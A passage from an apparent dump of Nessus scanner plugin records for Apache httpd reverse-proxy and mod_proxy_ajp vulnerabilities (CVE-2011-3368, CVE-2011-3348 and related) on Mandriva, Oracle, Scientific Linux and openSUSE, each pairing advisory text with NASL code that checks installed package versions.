Revision\n1179239 patch is in place, does not properly interact with use of (1)\nRewriteRule and (2) ProxyPassMatch pattern matches for configuration\nof a reverse proxy, which allows remote attackers to send requests to\nintranet servers via a malformed URI containing an \\@ (at sign)\ncharacter and a : (colon) character in invalid positions. 
NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2011-3368\n(CVE-2011-4317).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-base-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-devel-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-htcacheclean-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_authn_dbd-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_cache-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dav-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dbd-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_deflate-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_disk_cache-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_file_cache-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ldap-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_mem_cache-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_ajp-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_scgi-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_reqtimeout-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ssl-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_userdir-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-modules-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-event-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-itk-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-peruser-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-prefork-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-worker-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-source-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"apache-base-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-devel-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", 
reference:\"apache-htcacheclean-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_authn_dbd-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_cache-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dav-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dbd-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_deflate-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_disk_cache-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_file_cache-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ldap-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_mem_cache-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_ajp-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_scgi-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_reqtimeout-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ssl-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_userdir-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-modules-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-event-2.2.21-0.4-mdv2011.0\", 
yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-itk-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-peruser-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-prefork-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-worker-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-source-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T18:30:05", "description": "From Red Hat Security Advisory 2011:1391 :\n\nUpdated httpd packages that fix two security issues and one bug are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. 
(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting the CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : httpd (ELSA-2011-1391)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2011-1391.NASL", "href": "https://www.tenable.com/plugins/nessus/68376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1391 and \n# Oracle Linux Security Advisory ELSA-2011-1391 
respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68376);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_bugtraq_id(49303, 49616, 49957, 50312);\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Oracle Linux 6 : httpd (ELSA-2011-1391)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1391 :\n\nUpdated httpd packages that fix two security issues and one bug are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. 
A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting\nthe CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002419.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/20\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-9.0.1.el6_1.3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-9.0.1.el6_1.3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-9.0.1.el6_1.3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-9.0.1.el6_1.3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-9.0.1.el6_1.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:51:11", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. 
(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions.\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL6.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111020_HTTPD_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61161);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update\n introduced regressions in the way httpd handled certain\n Range HTTP header values. This update corrects those\n regressions.\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1110&L=scientific-linux-errata&T=0&P=2151\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7548291d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", 
reference:\"httpd-debuginfo-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-9.sl6.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-19T17:20:49", "description": "This update fixes several security issues in the Apache webserver.\n\nThe patch for the ByteRange remote denial of service attack (CVE-2011-3192) was refined and the configuration options used by upstream were added. Introduce new config option: Allow MaxRanges Number of ranges requested, if exceeded, the complete content is served. default: 200 0|unlimited: unlimited none: Range headers are ignored. 
This option is a backport from 2.2.21.\n\nAlso fixed: CVE-2011-3348: Denial of service in proxy_ajp when using a undefined method.\n\nCVE-2011-3368: Exposure of internal servers via reverse proxy methods with mod_proxy enabled and incorrect Rewrite or Proxy Rules.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:1217-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-worker", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_APACHE2-111026.NASL", "href": "https://www.tenable.com/plugins/nessus/75426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5347.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75426);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:1217-1)\");\n script_summary(english:\"Check for the apache2-5347 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several 
